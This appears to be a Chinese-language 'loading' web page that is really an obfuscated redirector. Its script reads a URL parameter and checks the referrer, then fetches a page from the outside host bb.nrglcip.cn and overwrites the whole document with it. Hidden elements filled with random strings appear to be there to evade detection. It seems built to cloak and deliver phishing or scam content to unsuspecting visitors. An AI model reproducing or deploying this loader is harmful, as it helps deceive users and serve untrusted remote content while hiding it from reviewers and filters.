<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .onIHxipK {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .onIHxipK .vzlKTGnM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .onIHxipK .content {
            line-height: 50px;
            text-align: center
        }

        .onIHxipK .img {
            width: 100%
        }

        .onIHxipK .lnTZObfJ {
            text-align: center
        }

        .onIHxipK .lnTZObfJ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .onIHxipK .lnTZObfJ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .onIHxipK .lnTZObfJ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .onIHxipK .lnTZObfJ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .onIHxipK .lnTZObfJ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .onIHxipK .lnTZObfJ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .onIHxipK .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function hIodFUZKcs(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var WEKTHg = hIodFUZKcs('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ WEKTHg +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ WEKTHg +".html?a=share";
		}
		
        DtJmFfHm=url+"#"+new Date().getTime();
        DtJmFfHm && function() {
            $.get(DtJmFfHm, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>darHND3EmTtDXOUGLB7fT0G1F4asZwK2kh4Sif3y0lWyZbMFk7DYu52iiFMEfO4q1blgRjyxIPEwPEwbICSLjUoT4Y6sneEzB</span>
<p  style='display:none'>gSs3sFdVEWc3xkhyC3LSDtPoGk1AxM8G5HX0tjp3kKDiKxYn1xyWRQzCoJu5eOMlpJRhChVrMPLn2R0e4oTgFaugiTqhZlrCHs</p>
<p  style='display:none'>gSs3sFdVEWc3xkhyC3LSDtPoGk1AxM8G5HX0tjp3kKDiKxYn1xyWRQzCoJu5eOMlpJRhChVrMPLn2R0e4oTgFaugiTqhZlrCHs</p>
<ul style='display:none' >sEtDVCxgOY17TIQ</ul>
<a  href='#' style='display:none'>sV2QbKv5ztcpNJVXsOv4ZI2PCvhjL</a>
<ul style='display:none' >sEtDVCxgOY17TIQ</ul>
<b style='display:none' >D1j0PugUwba2hKKSKX4NRrZCY6kNyq9qttQhXxwNdOyY2rvU0EH8JTTjE1MRxJU3Zd5tSkRyAW</b>
<h1 style='display:none' >LoDxQt4ReHoalIQjJWkgwZYTMWHWz4n7XfHuqzpQtWvKYcNne4lZwMv1GqXkz3UEX7SWZaaKb2vtjZxq0P7zs1w9uaCnHlIPt5W4</h1><div class="onIHxipK">
    <div class="vzlKTGnM">
        <div class="lnTZObfJ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >LRpth2iSBralZ1895gDy9TRrt8MBFLCzWiREKGZx2WHitbLrsV4raL</ul>
<ul style='display:none' >LRpth2iSBralZ1895gDy9TRrt8MBFLCzWiREKGZx2WHitbLrsV4raL</ul>
<a  href='#' style='display:none'>cq1LFNmpvLdL173mqxEsyS1qP8GUD6XNpGkgKdvdQRo1eerHFZ56Yc5ovXTAOCcdpsCoYfufhCB9vThZeXTLY0xmT6lQED4</a>
<a  href='#' style='display:none'>cq1LFNmpvLdL173mqxEsyS1qP8GUD6XNpGkgKdvdQRo1eerHFZ56Yc5ovXTAOCcdpsCoYfufhCB9vThZeXTLY0xmT6lQED4</a>
<li style='display:none' >GVY5j7roYM2heRk94PynRs5tquGO4LgVr2wIh4jAoX1Lwu</li>
<div style='display:none'>DTgFxmG2kxO2TulqpNJjrmtH0aFcJ7oUS</div>
<b style='display:none' >QLUUGuuKUtMbc0MBfsHcxBzZENkLcV4wMFAL84TnqBqPU09jMqKsb</b></body>
</html>